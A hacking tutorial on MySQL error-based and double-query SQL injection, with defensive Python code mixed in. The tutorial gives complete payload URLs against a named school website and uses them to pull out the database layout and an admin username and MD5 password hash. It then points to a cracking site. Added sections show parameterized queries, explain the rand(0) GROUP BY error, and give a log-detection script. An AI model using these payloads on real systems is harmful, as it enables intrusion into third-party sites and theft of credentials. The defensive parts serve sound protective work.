Kyfx

Understanding Error Based/Double Query Work/Chapter tutorial

Oct 30th, 2015
Difficulty: Intermediate Level 2 and Advanced
Requirements: Patience, intuition and understanding
Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)
Previous Chapters:

Chapter 1: How to use/create dorks
Chapter 2: Basic SQL injection using login queries
Chapter 3: Detailed Union/Normal Based SQL injection

Alright, I'll make this tutorial as short as possible so that you can understand faster.


Understanding Error Based/Double Query
How do Error Based and Double Query work?
Error Based:

A method of extracting information from a database when UNION SELECT does not work at all. The information is pulled out with a crafted query that makes the database include it in an error message.
Double Query:
Code:
Basically like Error Based, except that the Error Based query is doubled up into a single query statement so that we get errors with information in them.
I'll explain further in this tutorial.
Anyway, focus on this part of the tutorial:
Error Based IS Double Query
Error Based = Double Query (Error Based 2x)
How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking: knowing which type of injection to use in which situation.
You can use Error Based/Double Query injections when you get the following errors:
Code:
a. The used SELECT statements have a different number of columns.
b. Unknown column 1, or no columns at all (in the webpage and page source)
c. Error #1604
Now take note of those errors. You'll be needing them.
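From the defender's side, the errors listed above only reach the visitor because the page builds its SQL from the raw pageID value and echoes the database's error text. As an added example (not the tutorial's or the site's code), here is a Python/sqlite3 stand-in for the PHP handler: the string-built version beside one that validates the integer, binds it as a parameter, and never returns the database's own error message. The table and rows are constructed sample data.

```python
import sqlite3

# Stand-in for the page table behind index.php?mode=getpagecontent&pageID=N
# (constructed sample data, not the real site's schema).
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE pages (pageID INTEGER PRIMARY KEY, content TEXT);
    INSERT INTO pages VALUES (21, 'About the school');
    INSERT INTO pages VALUES (22, 'Contact');
""")


def get_page_vulnerable(page_id):
    """String-built query: whatever follows pageID= becomes part of the SQL."""
    sql = "SELECT content FROM pages WHERE pageID=" + page_id
    return [row[0] for row in conn.execute(sql)]


def get_page_hardened(page_id):
    """Validate the type first, then bind the value so it can only be data."""
    try:
        pid = int(page_id)
    except (TypeError, ValueError):
        raise ValueError("pageID must be an integer")
    rows = conn.execute("SELECT content FROM pages WHERE pageID=?", (pid,))
    return [row[0] for row in rows]


def handle_request(page_id, log):
    """HTTP-style wrapper: generic messages to the client, details to the log.

    Error Based injection depends on the database's own error text being shown
    to the client, so the 500 branch must never include str(exc).
    """
    try:
        rows = get_page_hardened(page_id)
    except ValueError:
        log.append(f"rejected non-integer pageID: {page_id!r}")
        return 400, "Bad request"
    except sqlite3.Error as exc:
        log.append(f"database error: {exc}")
        return 500, "Internal error"
    return (200, rows[0]) if rows else (404, "Not found")


if __name__ == "__main__":
    audit = []
    print(get_page_vulnerable("21 or 1"))           # both rows: the injected 'or 1' ran
    print(handle_request("21 or 1", audit), audit)  # (400, 'Bad request')
```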
Let's start with Error Based SQL injection
Alright, for this lesson we'll use this site as an example:
http://www.aliqbalschools.org

The first step is finding out the version of the database.

To do that we enter this query after the end of the URL
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

So the site will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

Results:
[Image: TIqze.png]
Now that we know the database version, which is 5, let's move to the next step.
Second step: Getting the database name
To get the database name, we enter this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the LIMIT clause in the query.
A website can have more than two databases, so increase the limit until you find all the database names.
Example: limit 0,1 or limit 1,1 or limit 2,1

Now our website address will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:
[Image: BmmpO.png]
Database is: iqbal_iqbal

The second step is done: we have extracted the database name we need.
MAKE sure you write the database name down on paper or in Notepad.
We'll need it later.
Third Step: Getting the TABLE NAMES
Table names are what we need now.
Here's the query we can use:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Don't forget the LIMIT clause, which we use here to get the table names one by one.

Alright, our web address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now here's the important part:
When you search for tables, keep incrementing the limit until you find the valuable table name.
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from.
Here's the formula: LIMIT N,1 where N is the row offset (0, 1, 2, ...)

Valuable tables can be:
Code:
Users
Admin
user
administrator
tbladmin
tblusers
settings
In this case, we have the table "settings".
So now we know our table; let's move on to the next step.
Fourth Step: Getting columns from specific TABLE NAMES
Alright, now that you've chosen the table you want to extract columns from, it's time to execute another query.
So here's what a column extraction query looks like:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Notice the LIMIT 0,1 clause and 0xTABLEHEX.
You need to convert your table name into hex and add 0x at the beginning of the string so that the website can read it.
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's what the address will look like along with the query
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Results:
Code:
Duplicate entry 'Id~1' for key 'group_key

Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Column name = passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
[Image: kNbNI.png]
Again, don't forget to look at the LIMIT clause.
Now that we've found the columns we want to extract information from, i.e. "userName" and "passWord", let's proceed to the next step, where we actually get the login username and password.
Fifth Step: Extracting the data from the columns
Alright, this part is probably the best part of SQL injecting a site.
Time to get the info from the columns we have.
To do that, use this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now before you proceed, look at the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2. Databasename: where you insert the current database name of the website so that you extract info from it
3. TABLENAME: where you insert the name of the table you extracted the column names from
4. LIMIT N,1: the LIMIT clause, where N is the row offset
Now let's do some replacing. FOCUS:
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"
After you're done altering the code to the information you need, it's time to execute it.
Here's what the code will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
[Image: PTqli.png]
SUCCESS, you injected the site with Error Based; now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 hash
Now let's start with DOUBLE Query SQL injection
So basically, as stated above, Double Query is the same as Error Based except that the query we enter is going to be double the normal Error Based query.
First off, the definition so that you can understand:
Code:
Double query SQL injection is a vulnerability that uses two queries wrapped together into one, which confuses the database to the point where it spits out an error. This error gives us the information we need to leverage the database all the way to the admin panel. As a matter of fact, we can pretty much dump the whole database if we want.
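Why the grouped query "confuses the database" into a Duplicate entry error, for both the Error Based description at the top and this definition: an added example, not part of the tutorial, that models MySQL's RAND(0) generator and the lookup/insert steps of a temporary-table GROUP BY. The generator constants are those of MySQL's my_rnd(); the grouping loop is a simplified model of the server's behaviour, not its source code.

```python
# Added model of why "concat(<value>, floor(rand(0)*2)) ... group by x" errors in MySQL.
# The LCG below reproduces MySQL's RAND(seed) (my_rnd); the grouping loop is a
# simplified model of the server's temporary-table GROUP BY, not MySQL source.
MAX_VALUE = 0x3FFFFFFF


def mysql_rand(seed):
    """Yield the RAND(seed) sequence MySQL produces for a fixed integer seed."""
    seed1 = (seed * 0x10001 + 55555555) % MAX_VALUE
    seed2 = (seed * 0x10000001) % MAX_VALUE
    while True:
        seed1 = (seed1 * 3 + seed2) % MAX_VALUE
        seed2 = (seed1 + seed2 + 33) % MAX_VALUE
        yield seed1 / MAX_VALUE


def floor_rand0_times_2(n):
    """The first n values of floor(rand(0)*2): a fixed 0,1,1,0,1,1,... pattern."""
    gen = mysql_rand(0)
    return [int(next(gen) * 2) for _ in range(n)]


def simulate_group_by(num_rows, value):
    """Model GROUP BY over num_rows rows with key = value || floor(rand(0)*2).

    The server evaluates the key once to look the group up; when the group is
    new it evaluates the key again while writing the row into the temporary
    table. Because rand(0) advances on every call, the key written can differ
    from the key looked up, and the second write of '<value>1' collides with
    the unique group_key index. Returns the error text, or None if no error.
    """
    gen = mysql_rand(0)
    groups = {}
    for _ in range(num_rows):
        key = f"{value}{int(next(gen) * 2)}"      # evaluated for the lookup
        if key in groups:
            groups[key] += 1
            continue
        key = f"{value}{int(next(gen) * 2)}"      # re-evaluated on insert
        if key in groups:
            return f"Duplicate entry '{key}' for key 'group_key'"
        groups[key] = 1
    return None


if __name__ == "__main__":
    print(floor_rand0_times_2(6))          # [0, 1, 1, 0, 1, 1]
    print(simulate_group_by(2, "Id~"))     # None: two rows never collide
    print(simulate_group_by(3, "Id~"))     # Duplicate entry 'Id~1' for key 'group_key'
```

The model also shows why the grouped table needs at least three rows, which is why the payloads group over information_schema.tables.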

Differences:
Error Based query for database extraction:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Double Query for database extraction:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Now you get the idea; let's cut to the chase and go on.
We'll be using the same site as above.
Step 1: Getting the database version
Alright, same as Error Based; here's the Double Query:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

So our address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

NOTE (IMPORTANT): Make sure your queries are very well organized when you execute them; otherwise the page will return a plain error instead of the result.

Results after query execution:
Code:
Duplicate entry '~'5.1.56-log'~1' for key 'group_key
Database version is 5
You can test it on the site now if you want so that you won't get confused.
Step 2: Getting the database
Now that we've got the version, let's execute a double query to extract the database name.
Query for database extraction:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the LIMIT clause again and make sure you don't make mistakes in it.
It reads
LIMIT N,1 where N is the row offset. Example: LIMIT 0,1

Here's what our address will then look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Once more, don't forget about the LIMIT clause.

So here's the result:
Code:
iqbal_iqbal
Now that's their database.
Note it down in Notepad or on paper.
Step 3: Getting the table names
As I've explained above, we'll also be using the LIMIT clause in this query.
Just a quick look; the query will look like this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1

Alright, you need to focus on the code and see the changes.
There are two variables here:
1. Hex_code_databasename
2. LIMIT clause

Obviously, we need to hex the database name we've just noted down and add 0x at the beginning, i.e. Database = 0x followed by the hex of iqbal_iqbal
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you have the database name in hex, let's see what our address will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

LIMIT 19,1 brings us the valuable table, which is "settings".
Review the code and study it.
Step 4: Getting column names from a specific table and database
Now that we know what we need, which are the table (settings) and the database (iqbal_iqbal), let's proceed to the next step: column extraction.
Here's what the query will look like:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Now here we have 3 variables:
1. Hex code of Databasename: the hex of the database name, which in our case is (iqbal_iqbal)
2. Hex code of tablename: the hex of the table name, which is "settings"
3. LIMIT clause
Alright, I'm pretty sure you know exactly what you have to do, so I don't need to explain everything again and again.

Here's what the address is going to look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Notice the hexed variables and the LIMIT clause.
Keep incrementing the LIMIT until you find the valuable columns, which in our case are "userName" and "passWord".
Review what we have just done to avoid confusion.
Step 5: Getting the data from the columns with the help of the table name and database name
Alright, now that we know what we need to extract, let's get our goods.
From what we've injected into the site so far, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord

Here's what the query will look like first (for extracting data):
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Variables:
table_name.column_name: input the table name and column name you want to extract information from

database_name.table_name: input the database name and table name you want to extract information from

LIMIT clause: increment until you find the data you need

So here's what our address is going to look like when we extract details from userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Code:
admim

Query for extracting details from passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Output:
Code:
86f574c1d63d53fa804c13c3213953d9

Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9

Alright, I think that's pretty much what you have to know about Error Based/Double Query SQL injection.
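For anyone watching a web application's logs, the payload shapes used throughout this chapter are distinctive: floor(rand(0)*2) next to a GROUP BY, reads from information_schema, hex literals after an equals sign, and concat() around version()/database()/table_name/column_name. The following is an added detection example (not part of the tutorial) that URL-decodes access-log entries, tags the matching request signatures, and pulls the leaked value out of a "Duplicate entry ... for key 'group_key'" message in a response body. The log lines and the signature names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the query shapes used in this tutorial
# (constructed patterns; tune them to your own application's traffic).
SIGNATURES = {
    "rand0_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "info_schema": re.compile(r"information_schema\.(tables|columns|schemata)", re.I),
    "hex_literal": re.compile(r"=\s*0x[0-9a-f]{6,}", re.I),
    "metadata_concat": re.compile(
        r"concat(_ws)?\s*\(.*\b(version|database|table_name|column_name|schema_name)\b", re.I),
}
# Response-side: the MySQL error text the tutorial reads its data out of.
DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key 'group_key")
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def classify_request(url):
    """Return the signature names matching a (possibly double-encoded) URL."""
    decoded = unquote_plus(unquote_plus(url))
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_access_log(lines):
    """Return (client, timestamp, status, signatures) for suspicious requests."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        client, ts, path, status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((client, ts, status, hits))
    return findings


def leaked_value(response_body):
    """Extract the value MySQL echoed in a group_key duplicate error, if any."""
    m = DUP_ENTRY.search(response_body)
    return m.group(1) if m else None


# Constructed access-log sample: one normal request, then the tutorial's
# version probe and column probe, URL-encoded as a browser would send them.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Oct/2015:10:00:01 +0000] "GET /index.php?mode=getpagecontent&pageID=21 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [30/Oct/2015:10:00:07 +0000] "GET /index.php?mode=getpagecontent&pageID=21%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201-- HTTP/1.1" 500 311',
    '203.0.113.5 - - [30/Oct/2015:10:00:15 +0000] "GET /index.php?mode=getpagecontent&pageID=21%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(column_name%20as%20char),0x7e))%20from%20information_schema.columns%20where%20table_name=0x73657474696e6773%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 420',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(leaked_value("Duplicate entry 'Id~1' for key 'group_key'"))  # Id~1
```

A run of 500 responses from one client whose requests carry these signatures, with the LIMIT offset climbing, is the server-side view of the "keep incrementing the limit" steps above.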